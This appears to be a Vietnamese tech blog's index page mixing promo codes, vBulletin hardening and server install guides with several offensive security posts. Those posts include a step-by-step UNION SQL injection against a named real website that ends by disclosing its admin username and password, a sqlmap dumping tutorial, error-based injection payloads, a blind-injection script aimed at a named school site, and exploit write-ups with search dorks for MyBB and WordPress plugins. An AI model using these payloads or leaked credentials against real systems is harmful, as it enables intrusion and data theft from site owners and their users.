Dương-UG Blog's

Redbox Promo Codes March 2018

2x Points on Select Nominated Movies
Ends: 03/12/18 Details: Get 2x points on select nominated movies
Rent 1, Get 1 Free
Expires: 03/08/18 Details: Rent One, Get One Free
$1.25 Off 1st Night of Any Rental
Details: Take $1.25 off 1st night of any rental. One time use only.
Rent 1, Get 1 Free on Your Order
Details: Rent One, Get One Free on your order
1 Free When You Rent 1
Expires: Today Details: Get One Free when you Rent One
$1.25 Off 1st Night of Any Rental
Details: Take $1.25 off 1st night of any rental. One time use only!
$1 Off The First Day Rental of Any Movie
Details: Get $1 off the first day rental of any movie.
Two 1-night DVD Rentals for $2
Details: One time use only! Get Two 1-night DVD rentals for $2.
One DVD Rental Free for The First Night When You Rent Any 2 DVD
Details: Get One DVD rental free for the First night when you Rent any 2 DVD
2X Points on Movie & Game Rentals for Perks Members
Ends: 02/12/18 Details: Get 2X Points on movie & Game Rentals. Maximum of 75 extra Points on demand transaction for redbox perks members

Xem Thêm

 

Cách bảo vệ Admincp của diễn đàn Vbulletin​

Những việc mà các bạn cần tìm hiểu và làm đó là:
1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho :))
vd: Aitimduocadmincpnaykhong

2. Đặt mật khẩu bảo vệ thư mục cho cái thư mục admincp fake (Aitimduocadmincpnaykhong) này, có nhiều cách như add code vào global.php, index.php, hay đơn giản là cứ .htaccess + .htpasswd mà táng. Mấy bài hướng dẫn dạng này nhiều vô số kể các bạn tìm rồi làm theo thôi.

3. Thực hiện 2 bước dưới đây để chống lại việc tìm ra path thật bằng những tính năng có sẵn của Vbulletin.
a. Phân quyền lại cho các nhóm từ Mod
-> Cao nhất không cho xem Location của thành viên khác khi dùng chức năng Who's online nhiều bản việt hóa nó dịch thành "phúc trình vãng lai" gì đó trên forum. Cách phân quyền như sau: Login vào admincp trước rồi vào
Admin CP -> Usergroups -> Usergroup Manager -> Edit Usergroup -> Who's Online Permissions -> Can View Detailed Location Info for Users -> No
Save lại và làm tương tự cho các nhóm (Group) còn lại thế là xong phần phân quyền tránh dòm ngó.

b. Giới hạn Current activity (hoạt động hiện tại) trên các tài khoản có quyền truy cập vào admincp fake đó. bằng cách sửa code trong tempate đang sài. để không cho hiển thị những thông tin có thể làm lộ location của admin khi đang hành sự trên diễn đàn. Login vào admincp rồi vào

Styles & Templates -> Search in Templates -> tìm với skin muốn sửa và tìm với từ khóa : current activity
-> ra cái kết quả màu mè MEMBERINFO -> click vào nó và tìm tiếp với từ current activity sẽ thấy đoạn code như sau:


PHP:

Xem Thêm

 

SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT.Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......


don't worry here the solution

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


done... now is ok again ..but not show the f**k column vulnerable...

only add ---> - <---

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4​,25)--+-


well now show columns 6 and 7

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

done luck today in the first table ---admin is Admin Meh ok next

change the 0 by LIMIT to 1

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....########## this show username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

done here the username but continue searching for the pass .....change it for 2 and 3 etc ...


########### this show password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

well username and password by admin

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++++++++
+++++++++++++++++

now dump dates ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "admin" ) = username = admin) ###now column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done..Enjoy testing others Websites.REMEMBER

Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

Xem Thêm

 

Cài Đặt Apache2 Với Php5 Và Hỗ Trợ Mysql Trên Ubuntu 11.10

LAMP là chữ viết tắt thường được dùng để chỉ sự sử dụng các phần mềm Linux, Apache, MySQL và ngôn ngữ văn lệnh PHP hay Perl hay Python để tạo nên một môi trường máy chủ Web có khả năng chứa và phân phối các trang Web động. Bài viết sau sẽ hướng dẫn các bạn cài đặt máy chủ web Apache2 trên Ubuntu 11.10 server với PHP5 hỗ trợ cho mod_php và MySQL.

Lưu ý chung

Trong phần minh họa này chúng tôi sử dụng hostname server1.example.com với địa chỉ IP 192.168.0.23. Bạn có thể thay đổi sao cho phù hợp với mình.

Các bước sau cần chạy với quyền root, vì vậy bạn có thể chạy lệnh:


để đăng nhập với quyền root.

Cài đặt MySQL 5

  • Đầu tiên chúng ta sử dụng lệnh sau để cài đặt MySQL 5:


  • Bạn sẽ được yêu cầu cung cấp một mật khẩu cho MySQL của user root – đây là mật khẩu có giá trị cho người dùng root@localhost cũng như root@server1.example.com, vì thế chúng ta sẽ chỉ định một password cho MySQL:
New password for the MySQL “root” user: <– Mat khau root SQL
Repeat password for the MySQL “root” user: <– Mat khau root SQL

Cài đặt Apache2

Apache2 có sẵn trong gói Ubuntu, người dùng chỉ cần sử dụng lệnh sau để cài đặt:Bây giờ nhập vào đường dẫn http://192.168.0.23 trong trình duyệt của mình, bạn sẽ thấy trang của Apache2:

[​IMG]

Theo mặc định, thư mục root của Apache2 thuộc /var/www trong Ubuntu, và tập tin cấu hình của nó là/etc/apache2/apache2.conf. Các cấu hình bổ sung được lưu trữ trong thư mục con của thư mục /etc/apache2, chẳng hạn /etc/apache2/mods-enabled (cho các module Apache), /etc/apache2/sites-enabled (cho virtual hosts), và /etc/apache2/conf.d.

Cài đặt PHP5

Chúng ta tiến hành cài đặt PHP5 và module Apache PHP5 bằng lệnh:

Sau đó khởi động lại Apache:

Thử nghiệm PHP5 và ghi nhận thông tin về quá trình cài đặt

Theo mặc định, thư mục root của website là /var/www. Chúng ta sẽ tạo một tập tin php nhỏ (info.php) trong thư mục này và gọi nó trên trình duyệt. Tập tin này sẽ hiển thị các thông tin hữu ích về trình cài đặt PHP, chẳng hạn như phiên bản của PHP hiện tại.


1
<?phpphpinfo();?>


Bây giờ chúng ta gọi file này trên trình duyệt (192.168.0.23/info.php).

[​IMG]

Với hình ảnh trên cho thấy PHP5 đang hoạt động thông qua Apache 2.0 Handler (hiển thị tại dòng Server API). Nếu di chuyển tiếp xuống bên dưới bạn sẽ thấy các module đã được kích hoạt trong PHP 5. MySQL không được liệt kê có nghĩa là PHP5 không hỗ trợ MySQL. Chúng ta khắc phục bằng cách dưới đây:

“Bắt” PHP5 hỗ trợ MySQL

Để MySQL được hỗ trợ trong PHP5, chúng ta cần cài đặt gói php5-mysql. Đây là việc làm tốt để cài đặt các module khác của PHP5 cũng như những ứng dụng cần thiết về sau.

Tìm kiếm những module có sẵn của PHP5:


Chọn những gì cần cài đặt:


Cuối cùng restart Apache2:

Bây giờ bạn hãy tải lại trang 192.168.0.23/info.php trên trình duyệt của mình, kéo xuống dưới lần nữa bạn sẽ thấy những module mới, bao gồm cả MySQL:

[​IMG]

phpMyAdmin

PhpMyAdmin là một giao diện web, thông qua đó bạn có thể quản lý cơ sở dữ liệu MySQL. Vì vậy khuyến cáo bạn nên cài đặt nó.


Bạn sẽ nhận được câu hỏi sau:

web server to reconfigure automatically: <– nhập apache2
Configure database for phpmyadmin with dbconfig-common? <– nhập No

Sau đó bạn có thể truy cập vào phpMyAdmin theo 192.168.0.23/phpmyadmin/:

[​IMG]

Xem Thêm

 

Hướng dẫn sử dụng SqlMap Backtrack 5

Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.

Quote:
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.

1. Open up sqlmap
This image has been resized.Click to view original image

2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes
Quote:
./sqlmap.py -u website.com/index.php?id=? --dbs
With this command, you’ll be able to extract the databases.
Looks like this:


3. Once we have the DBS, it’s time to get the tables.
Quote:
./sqlmap website.php/index.php?id=? -D [dbname] --tables
4. After we get the tables which looks like this:

We need to get the columns.
Now, we need to write:
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
5. Once we get the columns
This image has been resized.Click to view original image

We need to dump the files.
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump
Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username --dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
http://uploading.com/ee6e71ed/hash-py
1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
Quote:
/root/hash.py
We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.

Xem Thêm

 

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected] - [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Fb Page : https://www.facebook.com/pages/Explo...99266860256538

# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2

# Security Risk : High

# Tested on : Linux

# Dork : inurl:ajaxfs.php

#################################

1)

if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");


2)

if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Google DORK : inurl:ajaxfs.php


# Exploit :

# http://site.com/mybb/ajaxfs.php?tooltip=[sql]

# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]


#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

Xem Thêm

 

Tool] Quick Blind SQL Injection script

Đây là script được code bằng python…Tự động khai thác dạng sql injection quick blind

Điều kiện: cài python và wget cho python

Gồm 2 class…(thật ra 1 cũng được nhưng để dành phát triển) và 1 hàm main

Các bạn có chỉnh sửa gì cứ mở file main.py ra sửa nha.

Ví dụ:

inject_link = ‘http://edu.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=26&p3=4331 ‘

Các bạn có thể đổi thành site xpath bất kỳ với định dạng caigido=sogido (sorry, mới làm được dạng này)

Lang man quá, đây là link tải Big Grin

sqli: Base class

sqli quick blind: Quick blind exploit

main application

Demo:

[Hình: Untitled12.png]

Xem Thêm

 

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng:

http://target.com/page.php?id = 1

Lệnh get version, database

http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color]

Tương tự vậy, lệnh get table:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….)

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),63,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tiếp theo, lấy column của một table nào đó

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=0xso_hex_cua_tablename) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tăng số 1 theo nguyên tắc như trên.

Và cuối cùng là dữ liệu:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

CEH

Xem Thêm

 

Backdoor trong modem D-Link và khai thác

Một người bạn đã đưa cho tôi bài viết này.

Backdoor trong modem D-Link và khai thác với chrome

reverse engineering đối với firmware của modem D-Link và phát hiện trong đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem D-Link.

Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng:


Mã:

Xem Thêm

 

WordPress Curvo Themes - CSRF File Upload

################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
################################################## #################################################

# Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path:
http://site.com/wordpress/wp-content/uploads/[FILE]
or
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]

Xem Thêm

 

Hướng dẫn cài đặt XenServer 6 và XenCenter

Yêu cầu hệ thống

XenServer chạy trực tiếp trên phần cứng đồng nghĩa với việc sẽ không có bất cứ thứ gì nằm giữa phần cứng và XenServer. Nói cách khác, XenServer đúng nghĩa là một hệ điều hành. Nó sẽ giao tiếp trực tiếp với phần cứng, gồm cả card mạng (NIC) và bộ điều khiển lưu trữ.

Chương trình yêu cầu CPU 64 bit kích hoạt Intel VT hoặc AMD-V. Nhưng, đây chỉ là khuyến nghị từ nhà cung cấp. XenServer vẫn có thể được cài nếu CPU không được kích hoạt Intel VT hay AMD-V. Tuy nhiên, các tiện ích và tính năng sẽ bị hạn chế.

Nhớ rằng, XenServer là một chương trình ảo hóa một phần. Nó sử dụng kỹ thuật ảo hóa một phần trong ảo hóa server. Do đó, chương trình đòi hỏi bộ xử lý trên server vật lý có khả năng thực hiện công nghệ ảo hóa để ta có thể tận dụng hết khả năng của nó.

Người dùng cần tối thiểu 2GB RAM chỉ để cài đặt XenServer, nhưng theo khuyến nghị, nên sử dụng ít nhất 8GB RAM, đặc biệt nếu người dùng dự định tạo nhiều máy ảo trên đó. Bản thân XenServer yêu cầu 16GB bộ nhớ nhưng, ta sẽ cần nhiều không gian hơn cho máy ảo.

Chương trình có thể hoạt động với một bộ điều khiển NIC 100Mb. Tuy nhiên, bộ điều khiển một Gigabit hay thậm chí 10Gigabit được khuyến nghị.

Phần cứng cho XenServer

Có thể đặt 1TB RAM, 16 NIC và 64 bộ xử lý logic trên một máy chủ (host) vật lý chạy XenServer. Nhớ rằng các bộ xử lý logic là sự kết hợp của nhiều lõi.

Hãy kiểm tra danh sách phần cứng tương thích (HCL) tại hcl.xensource.com trước khi trả tiền mua phần cứng hay thiết bị ngoại vi dự đính gắn vào server.

Trong hầu hết trường hợp, khi người dùng tìm đến một nhà cung cấp phần mềm và bảo cho họ cái mình định làm với server (ví dụ làm XenServer), trước hết, nhà cung cấp sẽ kiểm tra tính tương thích. Tuy nhiên, hãy kiểm tra các phần cứng như thiết bị ngoại vi, NIC… trong HCL để tránh những phát sinh trong quá trình cài đặt và sử dụng sau đó.

XenServer thực ra được cài trên phần cứng lớp server. Tuy nhiên, do là một bản phân phối Linux và do đang sử dụng kỹ thuật ảo hóa một phần nên nó có thể tương thích với nhiều loại máy để bàn hay thậm chí là laptop.

Vì vậy, nếu muốn thử nghiệm, người dùng có thể cài XenServer lên một laptop hay trên một máy trạm, chương trình sẽ vẫn hoạt động.

Tải Citrix XenServer 6 và XenCenter

Tải XenServer và XenCenter từ http://www.citrix.com/xenserver. Hoặc nếu có tài khoản MyCitrix, bạn có thể truy cập vào http://www.citrix.com/mycitrix để tải chương trình.

XenServer có dung lượng 508MB (file đuôi ISO) và XenCenter là 41MB.

Cài đặt XenServer thì nhanh và dễ dàng. Sau đây là các bước cài đặt:

Ghi file ISO vào một đĩa CD và cho đĩa vào ổ đĩa quang hoặc bung file bằng phần mềm như MagicISO.
Hãy đảm bảo VT (hay AMD-V) được kích hoạt trong BIOS của server.
Khởi động từ đĩa CD.
Đáp ứng các truy vấn thiết lập cơ bản và khởi động lại.
Thực hiện những cấu hình ban đầu, như gán địa chỉ IP, host name, mật khẩu…
Kết nối vào XenServer qua XenCenter.


Quá trình cài đặt chỉ mất khoảng 10 phút.
Yêu cầu cài đặt XenCenter

Citrix XenCenter là một ứng dụng nền Windows có thể được cài trên máy thật hoặc máy ảo.

Chương trình tương thích với bất cứ phiên bản Windows nào: Windows XP, Vista, 7, Server 2003, 2008 và 2008RC. XenCenter yêu cầu .NET Framework 3.5.

Yêu cầu được khuyến nghị như sau: Tần số 1GHz, RAM tối thiểu 2GB, tốc độ NIC ít nhất 100Mbps và độ phân giải màn hình tối thiểu 1024x768. Chương trình chiếm 100MB không gian đĩa cứng.
Cài đặt XenServer
http://www.thuvien-it.net/home/tinhoc/vi...eadid=7978

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương